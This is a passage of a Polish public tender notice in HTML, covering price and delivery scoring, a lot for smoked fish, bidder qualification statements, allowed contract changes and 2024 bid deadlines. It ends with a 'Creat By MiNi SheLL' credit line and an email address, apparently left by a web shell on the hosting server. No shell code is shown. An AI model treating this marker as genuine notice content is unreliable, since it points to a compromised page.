(T) – 40%<br/> <br/>2. Sposób oceniania ofert:<br/>1) Kryterium &#34;cena&#34;<br/>W kryterium cena (C), w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najkorzystniejszy wskaźnik (cena), zostanie zastosowany następujący wzór:<br/><br/> <br/> Cn<br/> Liczba zdobytych punktów (C) = ----- x 100 pkt x waga kryterium 60%<br/> Cb<br/>Gdzie :<br/> Cn - cena najniższa wśród ofert nieodrzuconych<br/> Cb - cena oferty badanej<br/> 60% - procentowe znaczenie kryterium ceny.-60 pkt.ZP<br/><br/><br/>Liczba punktów, którą można uzyskać w ramach tego kryterium, obliczona zostanie przez podzielenie ceny najniższej z oferowanych przez cenę oferty badanej/ocenianej i pomnożenie tak otrzymanej liczby przez 100 pkt i wagę kryterium, którą ustalono na 60%.<br/>Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2023r. poz. 1570 z późn. zm.) dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. Wykonawca, składając ofertę, zobowiązany jest:<br/>1)	poinformować Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>2)	wskazać nazwy (rodzaje) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>3)	wskazać wartość towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>4)	wskazać stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.<br/> <br/>2)	Kryterium „sposób dostawy” (Sd)<br/>Wniesienie do magazynu– 40 PKT<br/>Siedziba placówki parter bez wniesienia do magazynu – 0 PKT<br/><br/>W przypadku gdy Wykonawca w formularzu ofertowym nie wskaże drugiego kryterium Zamawiający przyjmie, iż jest to sposób wskazany jako „Siedziba placówki parter bez wniesienia do magazynu” Wykonawca otrzyma – 0 punktów (dotyczy wszystkich części).<br/><br/>Zamawiający za najkorzystniejszą uzna ofertę z najwyższym bilansem uzyskanych punktów określonych przez Zamawiającego kryteriach wg wzoru:<br/><br/> L = C + Sd<br/> Gdzie :<br/>	L – sumaryczna liczba punktów oferty badanej,<br/>	C – punkty w kryterium cena,<br/>	Sd- punkty w kryterium sposób dostawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) Kryterium „sposób dostawy” (Sd) Wniesienie do magazynu– 40 PKT Siedziba placówki parter bez wniesienia do magazynu – 0 PKT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ryba wędzona tuszka –ryba pozbawiona głowy wraz z pasem barkowym z płatami brzusznymi, z usuniętymi wnętrznościami, do bezpośredniego spożycia wskutek działania dymu wędzarniczego tkanka mięsna powinna być odpowiednio jędrna, prawidłowo, równomiernie wywędzona. Zapach, barwa, konsystencja, powierzchnia i przekrój mają świadczyć o świeżości produktu. Niedopuszczalne jest stosowanie aromatu dymu wędzarniczego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 728 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15234000-7 - Ryby wędzone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo zrealizowania Umowy do wartości niższej niż określona w Formularzu ofertowym<br/>(ograniczenia zakresu zamówienia), w zależności od faktycznych potrzeb Zamawiającego, wynikających ze zmieniającej się<br/>liczby podopiecznych korzystających z wyżywienia, zmiany ilości poszczególnych produktów wymaganych jadłospisem.<br/>Zamawiający zobowiązuje się do zlecenia dostaw w/w przedmiocie zamówienia do wysokości min. 60 % wartości brutto<br/>wskazanej w Formularzu ofertowym wykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-04-05 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) sposób dostawy (T) – 40%<br/> <br/>2. Sposób oceniania ofert:<br/>1) Kryterium &#34;cena&#34;<br/>W kryterium cena (C), w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najkorzystniejszy wskaźnik (cena), zostanie zastosowany następujący wzór:<br/><br/> <br/> Cn<br/> Liczba zdobytych punktów (C) = ----- x 100 pkt x waga kryterium 60%<br/> Cb<br/>Gdzie :<br/> Cn - cena najniższa wśród ofert nieodrzuconych<br/> Cb - cena oferty badanej<br/> 60% - procentowe znaczenie kryterium ceny.-60 pkt.ZP<br/><br/><br/>Liczba punktów, którą można uzyskać w ramach tego kryterium, obliczona zostanie przez podzielenie ceny najniższej z oferowanych przez cenę oferty badanej/ocenianej i pomnożenie tak otrzymanej liczby przez 100 pkt i wagę kryterium, którą ustalono na 60%.<br/>Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2023r. poz. 1570 z późn. zm.) dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. Wykonawca, składając ofertę, zobowiązany jest:<br/>1)	poinformować Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>2)	wskazać nazwy (rodzaje) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>3)	wskazać wartość towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>4)	wskazać stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.<br/> <br/>2)	Kryterium „sposób dostawy” (Sd)<br/>Wniesienie do magazynu– 40 PKT<br/>Siedziba placówki parter bez wniesienia do magazynu – 0 PKT<br/><br/>W przypadku gdy Wykonawca w formularzu ofertowym nie wskaże drugiego kryterium Zamawiający przyjmie, iż jest to sposób wskazany jako „Siedziba placówki parter bez wniesienia do magazynu” Wykonawca otrzyma – 0 punktów (dotyczy wszystkich części).<br/><br/>Zamawiający za najkorzystniejszą uzna ofertę z najwyższym bilansem uzyskanych punktów określonych przez Zamawiającego kryteriach wg wzoru:<br/><br/> L = C + Sd<br/> Gdzie :<br/>	L – sumaryczna liczba punktów oferty badanej,<br/>	C – punkty w kryterium cena,<br/>	Sd- punkty w kryterium sposób dostawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) Kryterium „sposób dostawy” (Sd) Wniesienie do magazynu– 40 PKT Siedziba placówki parter bez wniesienia do magazynu – 0 PKT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">: Oświadczenie Wykonawcy,<br/>o którym mowa w art. 125 ust. 1 ustawy o niepodleganiu wykluczeniu<br/>z postępowania – wg wzoru stanowiącego załącznik nr 2 do SWZ. Oświadczenie stanowi dowód potwierdzający brak podstaw<br/>wykluczenia Wykonawcy z postępowania na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego<br/>podmiotowe środki dowodowe, wskazane w SWZ.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez wykonawców, oświadczenie o którym mowa wyżej składa<br/>każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia wobec każdego z wykonawców.<br/>Oświadczenie, o którym mowa wyżej składa się pod rygorem nieważności w formie elektronicznej (tj. w postaci elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.<br/>1) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt. 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy w zakresie przesłanek wykluczenia z postępowania dotyczących zawarcia z innymi wykonawcami<br/>porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>– wg wzoru stanowiącego załącznik nr 3 do SWZ.<br/>2) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt. 1, 2 i odnośnie pkt 4 ustawy w zakresie orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem<br/>środka karnego,<br/>b) art. 108 ust. 1 pkt. 5 ustawy w zakresie przesłanek wykluczenia z postępowania dotyczących przynależności do tej samej grupy<br/>kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689), z<br/>innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, chyba że<br/>wykażą, że przygotowali te oferty lub wnioski niezależnie od siebie,<br/>– wg wzoru stanowiącego załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">O<br/>udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału<br/>w postępowaniu zgodnie z opisem zamieszczonym poniżej.<br/>1.1 Zdolność do występowania w obrocie gospodarczym - Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>1.2 Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów - Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>1.3 Sytuacja ekonomiczna lub finansowa- Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>1.4 Zdolności technicznej lub zawodowej- Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający wymaga<br/>Oświadczenie zał nr 2</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani są złożyć wraz z ofertą stosowne pełnomocnictwo – zgodnie z pkt XVI ust. 4 pkt. 4.4 SWZ – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>4. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie <br/>o którym mowa w art. 125 ustawy składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o udzielnie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia.<br/>5. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony dopuszczają zmiany istotnych postanowień niniejszej umowy, zgodnie z art. 455 ustawy Prawo zamówień publicznych, a nadto w przypadku wystąpienia następujących okoliczności, których nie można było przewidzieć w chwili zawierania niniejszej umowy, polegające na:<br/>a) zmianie powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiany stawki podatku od towarów i usług (VAT),<br/>b) zmianie terminu, częstotliwości dostaw i sposobu wykonywania umowy w przypadku, gdy niezbędna jest zamiana sposobu wykonywania lub terminu, częstotliwości realizacji przedmiotu umowy, o ile zmiana taka jest korzystna dla zamawiającego oraz konieczna w celu prawidłowego wykonania umowy,<br/>c) w zakresie rzeczowym przedmiotu umowy tj. zaprzestania wytwarzania produktu objętego umową, pod warunkiem, iż odpowiednik jest tej samej lub wyższej jakości, za cenę nie wyższą niż cena produktu objętego umową,<br/>d) w zakresie rzeczowym przedmiotu umowy tj. w sytuacji zaoferowania przez Wykonawcę odpowiednika w stosunku do produktu objętego umową, pod warunkiem, iż odpowiednik jest tej samej lub wyższej jakości za cenę nie wyższą niż cena produktu objętego umową,<br/>e) wprowadzeniu do sprzedaży przez producenta zmodyfikowanego/ udoskonalonego produktu powodującego wycofanie dotychczasowego za cenę nie wyższą niż cena produktu objętego umową,<br/>f) w zakresie numeru katalogowego, nazwy produktu wielkości opakowania przy zachowaniu jego parametrów - w przypadku wprowadzenia niniejszych zmian przez producenta potwierdzonych odpowiednimi dokumentami,<br/>g) zwiększeniu o 10% wartości umowy brutto, o ile stało się to niezbędne dla zapewnienia ciągłości dostawy oraz prawidłowego funkcjonowania stołówki na skutek okoliczności jakich nie można było przewidzieć na etapie prowadzenia postępowania o udzielenie zamówienia,<br/>2. Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-19 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy e-Zamówienia zgodnie z rozdziałem XVII niniejszej specyfikacji</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-19 09:40</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com